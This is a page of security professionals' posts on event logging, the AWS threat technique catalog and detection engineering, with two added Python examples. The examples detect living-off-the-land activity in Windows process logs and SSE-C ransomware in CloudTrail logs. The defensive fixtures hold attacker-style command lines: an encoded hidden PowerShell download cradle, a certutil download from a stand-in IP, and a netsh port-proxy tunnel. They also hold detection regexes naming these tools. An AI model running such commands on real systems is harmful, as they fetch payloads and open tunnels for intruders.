How to Improve Cloud Threat Detection in Organizations


  • Sean Connelly🦉
    Zscaler | Fmr CISA - Zero Trust Director & TIC Program Manager | CCIEx2, MS-IST, CISSP

    🌍International Guidance for Enhanced Cybersecurity: Best Practices for Event Logging and Threat Detection🌍

    The Australian Government's Australian Cyber Security Centre (ACSC), in collaboration with global partners like the #NSA, #CISA, the UK's #NCSC, and agencies from Canada, New Zealand, Japan, South Korea, Singapore, and the Netherlands, has released a comprehensive report on best practices for event logging and threat detection.

    🚀The report defines a baseline for event logging best practices and emphasizes the importance of robust event logging to enhance security and resilience in the face of evolving cyber threats.

    Why Event Logging Matters: Event logging isn't just about keeping records—it's about empowering organizations to detect, respond to, and mitigate cyber threats more effectively. The guidance provided in this report aims to bolster an organization’s resilience by enhancing network visibility and enabling timely detection of malicious activities.

    🔍 Key Highlights:
    🔹Enterprise-Approved Event Logging Policy: Develop and implement a consistent logging policy across all environments to enhance the detection of malicious activities and support incident response.
    🔹Centralized Log Collection and Correlation: Utilize a centralized logging facility to aggregate logs, making detecting anomalies and potential security breaches easier.
    🔹Secure Storage and Event Log Integrity: Implement secure mechanisms for storing and transporting event logs to prevent unauthorized access, modification, or deletion.
    🔹Detection Strategy for Relevant Threats: Leverage behavioral analytics and SIEM tools to detect advanced threats, including "Living off the Land" (LOTL) techniques used by sophisticated threat actors.

    📊 Use Case: Detecting "Living Off the Land" Techniques: One highlighted use case involves detecting LOTL techniques, where attackers use legitimate tools available in the environment to carry out malicious activities. The report showcases how the Volt Typhoon group leveraged LOTL techniques, such as using PowerShell and other native tools on compromised Windows systems, to evade detection and conduct espionage. Effective event logging, including process creation events and command-line auditing, was crucial in identifying these activities as abnormal compared to regular operations.

    Couple this report with the CISA Zero Trust Maturity Model (ZTMM): The report's best practices align with CISA's ZTMM's Visibility and Analytics capability. By following these publications, organizations can progress along their maturity path toward optimal dynamic monitoring and advanced analysis. (Full disclosure: I was co-author of CISA's ZTMM)

    💪Implementing these best practices from the Australian Signals Directorate & others is critical to achieving comprehensive visibility and security, aligning with global cybersecurity frameworks.

    #cybersecurity #zerotrust #digitaltransformation #technology #cloudcomputing #informationsecurity
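The process-creation and command-line auditing the post describes, as an added example that is not part of the post, the ACSC report or any CISA material: Python detection logic run over a handful of constructed Windows process-creation records (Security event 4688 / Sysmon event 1 style fields). It combines string rules on the audited command line with a baseline of parent-to-child image pairs seen during normal operation, which is how use of a legitimate binary is recognised as "abnormal compared to regular operations" even when no string rule fires. The rule patterns, host name, command lines and the baseline itself are all my own assumptions for the example (the netsh portproxy rule reflects publicly reported Volt Typhoon tradecraft, but the regex is mine, not the report's).

```python
"""Added example: flag living-off-the-land (LOTL) activity in Windows
process-creation telemetry (Security event 4688 / Sysmon event 1 style records).

Two complementary checks, since the guidance asks for both process creation
events and full command-line auditing:
  1. content rules on the command line (obfuscation, download cradles,
     native tools used for staging or tunnelling);
  2. a baseline of parent->child image pairs observed during normal operation,
     so a legitimate binary launched from an unusual parent is surfaced even
     when no string rule fires.
All event records, hosts and command lines below are constructed for the example.
"""
import re

# Command-line patterns that rarely appear in routine administration (assumed
# rule set). Case-insensitive because attackers vary casing to dodge naive matching.
SUSPICIOUS_CMDLINE = [
    ("powershell_encoded",
     re.compile(r"powershell.*\s-(e|ec|enc|encodedcommand)\s", re.I)),
    ("powershell_hidden_noprofile",
     re.compile(r"powershell.*-(nop|noprofile)\b.*-(w|windowstyle)\s+hidden", re.I)),
    ("download_cradle",
     re.compile(r"(IEX|Invoke-Expression|DownloadString|DownloadFile|Net\.WebClient)", re.I)),
    ("certutil_download",
     re.compile(r"certutil(\.exe)?\s.*-urlcache", re.I)),
    ("wmic_process_create",
     re.compile(r"wmic(\.exe)?\s.*process\s+call\s+create", re.I)),
    ("netsh_portproxy",
     re.compile(r"netsh(\.exe)?\s.*portproxy\s+add", re.I)),
]


def _image(path):
    """Lower-cased file name of a Windows path: 'C:\\Windows\\x.exe' -> 'x.exe'."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def build_baseline(events):
    """Parent->child image pairs observed during normal operation.

    In production this is learned from weeks of telemetry per host role; here it
    is seeded from a constructed set of benign events."""
    return {(_image(e["ParentProcessName"]), _image(e["NewProcessName"])) for e in events}


def analyze(events, baseline):
    """Return one finding per event that trips a command-line rule or spawns a
    parent->child pair absent from the baseline."""
    findings = []
    for i, e in enumerate(events):
        pair = (_image(e["ParentProcessName"]), _image(e["NewProcessName"]))
        cmd = e.get("CommandLine", "")
        rules = [name for name, rx in SUSPICIOUS_CMDLINE if rx.search(cmd)]
        new_pair = pair not in baseline
        if rules or new_pair:
            findings.append({"index": i, "host": e["Computer"], "pair": pair,
                             "rules": rules, "new_pair": new_pair, "cmd": cmd})
    return findings


def _ev(host, parent, image, cmd):
    """Build a trimmed 4688-style record (constructed, not captured)."""
    return {"EventID": 4688, "Computer": host, "ParentProcessName": parent,
            "NewProcessName": image, "CommandLine": cmd}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"

# Constructed "normal operations" telemetry used to seed the baseline.
BASELINE_EVENTS = [
    _ev("WS01", r"C:\Windows\explorer.exe", PS,
        r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
    _ev("WS01", r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
        r"C:\Windows\System32\svchost.exe -k netsvcs"),
    _ev("WS01", r"C:\Windows\explorer.exe", OFFICE + r"\OUTLOOK.EXE", '"' + OFFICE + r'\OUTLOOK.EXE"'),
    _ev("WS01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
]

# Constructed telemetry to analyse: two benign events and three LOTL-style ones.
NEW_EVENTS = [
    _ev("WS01", r"C:\Windows\explorer.exe", PS,
        r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
    _ev("WS01", OFFICE + r"\WINWORD.EXE", PS,
        "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"),
    _ev("WS01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
        r"certutil.exe -urlcache -split -f http://198.51.100.7/a.txt C:\Users\Public\a.txt"),
    _ev("WS01", r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
        r"C:\Windows\System32\svchost.exe -k netsvcs"),
    _ev("WS01", r"C:\Windows\explorer.exe", r"C:\Windows\System32\netsh.exe",
        "netsh interface portproxy add v4tov4 listenport=9999 connectaddress=10.0.0.5 connectport=3389"),
]

if __name__ == "__main__":
    for f in analyze(NEW_EVENTS, build_baseline(BASELINE_EVENTS)):
        print(f"[{f['host']}] {f['pair'][0]} -> {f['pair'][1]} "
              f"rules={f['rules'] or '-'} new_pair={f['new_pair']}: {f['cmd']}")
```

Run stand-alone it reports the Word-spawned encoded PowerShell, the certutil download and the netsh portproxy, and stays silent on the scheduled inventory script and svchost. The string rules only work because command-line auditing is on (Windows 4688 omits the command line unless "Include command line in process creation events" is enabled); the baseline check is the part that survives an attacker renaming or re-encoding the command, which is the robustness the report is after.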

  • Christophe Limpalair
    Cloud Security Training ☁️ Cybr.com

    Everyone is talking about the new Threat Technique Catalog for AWS, but what is it and how do you use it? Let’s take a look.

    🔍 What it is: Every technique in this catalog comes from real security events #AWS CIRT investigated. They've taken #MITRE ATT&CK techniques and enhanced them with AWS-specific detection methods, plus added ones not already covered that they've observed in the wild.

    🎯 How to use it tactically:
    📌 Map threats to services you use: Use the sidebar to drill into specific AWS services like S3, IAM, or EC2 and see what attackers have used against them.
    📌 Search/monitor CloudTrail for sketchy events: Each technique includes CloudTrail event names (e.g., iam:CreateAccessKey, s3:PutBucketPolicy) so you can build detection logic or hunt for suspicious patterns.
    📌 Build playbooks + mitigations: It includes practical detection and mitigation guidance. Use this to update your detection rules or reinforce IAM policies.

    The catalog organizes techniques by AWS service, i.e., if you're securing #S3, you can see exactly how attackers could target S3 and what CloudTrail events to watch for.

    💡Example: If you’re worried about S3 #ransomware via SSE-C key encryption, you can go here (https://lnkd.in/eQzEmmTS) and you’ll see:
    + Pre-requisites for an attacker to pull this off
    + Specific CloudTrail Event(s) to look for (in this case s3:CopyObject)
    + How to set up detection
    + How to mitigate

    This bridges the gap between theoretical attack frameworks and real-world AWS security monitoring. A lot of us probably already have this info and knowledge (especially if you train with Cybr) but having it all in a central location, with this formatting, and managed by CIRT is a big benefit!

    🔗Start here: https://lnkd.in/epefnPU4

    #awscommunitybuilders #awssecurity #cloudsecurity
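The CopyObject hunt the post points at, as an added example that is neither the post's nor the AWS CIRT catalog's own code: Python that reads a CloudTrail log body and alerts when one principal rewrites several objects in a bucket in place with customer-provided keys (SSE-C) inside a short window. Assumptions to verify against your own trail: S3 data events must be enabled (a management-events-only trail never contains CopyObject); an SSE-C request is identified by `additionalEventData.SSEApplied == "SSE_C"` and/or the `x-amz-server-side-encryption-customer-algorithm` request parameter, which is my reading of the S3 data-event schema; and "in place" is my own heuristic, meaning `x-amz-copy-source` names the destination bucket and key. The principals, IP addresses, bucket names, timestamps and threshold are constructed for the example.

```python
"""Added example: hunt CloudTrail S3 data events for mass in-place re-encryption
of objects with customer-provided keys (SSE-C), the ransomware pattern the
catalog entry maps to CopyObject.

Assumptions (verify against your own trail):
  * S3 data events are enabled on the trail; management-only trails never
    contain CopyObject at all.
  * An SSE-C request shows up as additionalEventData.SSEApplied == "SSE_C"
    and/or the x-amz-server-side-encryption-customer-algorithm request parameter.
  * "In place" means x-amz-copy-source equals the destination bucket/key, i.e.
    the object is rewritten over itself under the attacker's key.
All log records below are constructed for the example, not captured.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

SSEC_HEADER = "x-amz-server-side-encryption-customer-algorithm"


def load_records(log_text):
    """Parse a CloudTrail log file body ({"Records": [...]}) into a list of dicts."""
    return json.loads(log_text)["Records"]


def is_ssec_copy(rec):
    """True for an S3 CopyObject that applied SSE-C."""
    if rec.get("eventSource") != "s3.amazonaws.com" or rec.get("eventName") != "CopyObject":
        return False
    params = rec.get("requestParameters") or {}
    extra = rec.get("additionalEventData") or {}
    return extra.get("SSEApplied") == "SSE_C" or SSEC_HEADER in params


def is_in_place(rec):
    """True when the copy source is the same bucket/key as the destination."""
    p = rec.get("requestParameters") or {}
    src = p.get("x-amz-copy-source", "").lstrip("/")
    return src == f"{p.get('bucketName')}/{p.get('key')}"


def hunt(records, threshold=3, window=timedelta(minutes=10)):
    """One alert per (principal, bucket) with >= threshold in-place SSE-C copies
    inside any window-long span. A single copy is ignored: a legitimate key
    change looks identical for one object, not for a whole bucket."""
    by_actor = defaultdict(list)
    for r in records:
        if is_ssec_copy(r) and is_in_place(r):
            t = datetime.strptime(r["eventTime"], "%Y-%m-%dT%H:%M:%SZ")
            p = r["requestParameters"]
            by_actor[(r["userIdentity"].get("arn"), p["bucketName"])].append((t, p["key"]))
    alerts = []
    for (arn, bucket), hits in by_actor.items():
        hits.sort()
        for i in range(len(hits)):          # sliding window over sorted hits
            j = i
            while j < len(hits) and hits[j][0] - hits[i][0] <= window:
                j += 1
            if j - i >= threshold:
                alerts.append({"principal": arn, "bucket": bucket, "count": j - i,
                               "first_seen": hits[i][0].isoformat(),
                               "objects": [k for _, k in hits[i:j]]})
                break
    return alerts


def _rec(when, arn, src_ip, bucket, key, copy_source, sse, ssec_header=False):
    """Build a trimmed CloudTrail S3 data-event record (constructed, not captured)."""
    params = {"bucketName": bucket, "key": key, "x-amz-copy-source": copy_source}
    if ssec_header:
        params[SSEC_HEADER] = "AES256"
    return {"eventVersion": "1.08", "eventTime": when, "eventSource": "s3.amazonaws.com",
            "eventName": "CopyObject", "sourceIPAddress": src_ip,
            "userIdentity": {"type": "IAMUser", "arn": arn},
            "requestParameters": params,
            "additionalEventData": {"SSEApplied": sse, "AuthenticationMethod": "AuthHeader"}}


BACKUP = "arn:aws:iam::123456789012:user/backup-svc"    # constructed principal
DEV = "arn:aws:iam::123456789012:user/dev-migration"    # constructed principal

SAMPLE_LOG = json.dumps({"Records": [
    # three in-place SSE-C rewrites of corp-finance objects within seconds
    _rec("2024-06-01T10:00:01Z", BACKUP, "203.0.113.9", "corp-finance", "q1/ledger.csv",
         "/corp-finance/q1/ledger.csv", "SSE_C", True),
    _rec("2024-06-01T10:00:03Z", BACKUP, "203.0.113.9", "corp-finance", "q1/payroll.xlsx",
         "/corp-finance/q1/payroll.xlsx", "SSE_C", True),
    _rec("2024-06-01T10:00:05Z", BACKUP, "203.0.113.9", "corp-finance", "q2/ledger.csv",
         "/corp-finance/q2/ledger.csv", "SSE_C", True),
    # benign: in-place copy that re-encrypts under the bucket's KMS key
    _rec("2024-06-01T10:02:00Z", DEV, "10.0.4.12", "corp-finance", "q2/notes.txt",
         "/corp-finance/q2/notes.txt", "SSE_KMS"),
    # benign: one SSE-C copy into a different bucket (a migration), below threshold
    _rec("2024-06-01T10:05:00Z", DEV, "10.0.4.12", "new-bucket", "data.bin",
         "/old-bucket/data.bin", "SSE_C", True),
]})

if __name__ == "__main__":
    for a in hunt(load_records(SAMPLE_LOG)):
        print(f"{a['principal']} rewrote {a['count']} objects in s3://{a['bucket']} "
              f"with SSE-C starting {a['first_seen']}: {a['objects']}")
```

Run stand-alone it raises one alert for backup-svc against corp-finance and nothing for the KMS rewrite or the single cross-bucket migration. Detection here is after the fact; the preventive control on the catalog's "how to mitigate" side is a bucket policy that denies PutObject and CopyObject when the `s3:x-amz-server-side-encryption-customer-algorithm` condition key is present, so SSE-C never reaches the bucket unless you actually use it.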

  • Dylan Williams
    Simplifying AI for Security Professionals

    In addition to threat modeling, we need detection modeling. This is a core part of threat informed defense. Starting with known threats (whether it's ATT&CK or bespoke scenarios internally) is a great start, but there's still a lot of work & nuance to get this to a finished analytic or detection. We want to know things like:
    - how threats specifically manifest in OUR environment
    - build detections that actually work for OUR tech stack and processes

    Really cool release from the "Summiting the Pyramid" framework from Center for Threat-Informed Defense to help us bridge this gap: Detection Decomposition Diagrams (D3). These D3 visuals give defenders a view across multiple implementations of a technique to identify analytic and event observables for robust detections. D3 visuals include benign and malicious implementations of the technique. Observables which span across multiple implementations provide higher robustness; that is, resistance to adversary evasion over time. Other observables may be used for better accuracy rates.

    This coincides with the OpenTide paper released by Amine Besson (Threat Informed Detection Modeling and Engineering as-Code) which is an absolute gold mine of how & why to do this in practice. These approaches connect abstract capabilities to concrete detection opportunities. The real power comes from combining threat modeling WITH detection modeling. This concept is not necessarily new & is the product of a lot of great work already done by folks like Andrew VanVleet as well. It's a whole other level when you can combine TTPs with prevalence, choke point and actionability to the texture of which all detections are written (logs!) with information like core/tiered observables. This is how you create robust & accurate detections.

    Check out the great work by these folks below:
    ⛰️ Summit the Pyramid v2 Release: Center for Threat-Informed Defense https://lnkd.in/eb9Cb8Q5
    🌊 OpenTide: https://lnkd.in/emcX4rKk
    🧱 Improving Threat Identification with Detection Data Models: https://lnkd.in/eZ5HGw-T

  • Mandy Andress
    CISO | Investor | Board Member | Advancing the Future of Innovation in Cybersecurity

    AI and data are changing how we protect our organizations, and there are some smart ways CISOs can make the most of these tools. First, machine learning helps spot unusual behavior by analyzing tons of data in real time—things like odd login times or unexpected scripts running. Yet, models need to keep learning, so regularly updating them with new info and analyst feedback is key. Bringing data scientists into security teams can really sharpen threat detection by tailoring insights to your specific setup. Plus, custom AI models can help hunt threats, spot vulnerabilities, and even flag AI-generated attacks. Transparency is important too. Explainable AI helps everyone understand why a system flags something, building trust and better decisions. At the end of the day, close teamwork between security pros and data experts makes all the difference. #AI #MachineLearning #Cybersecurity #CISO
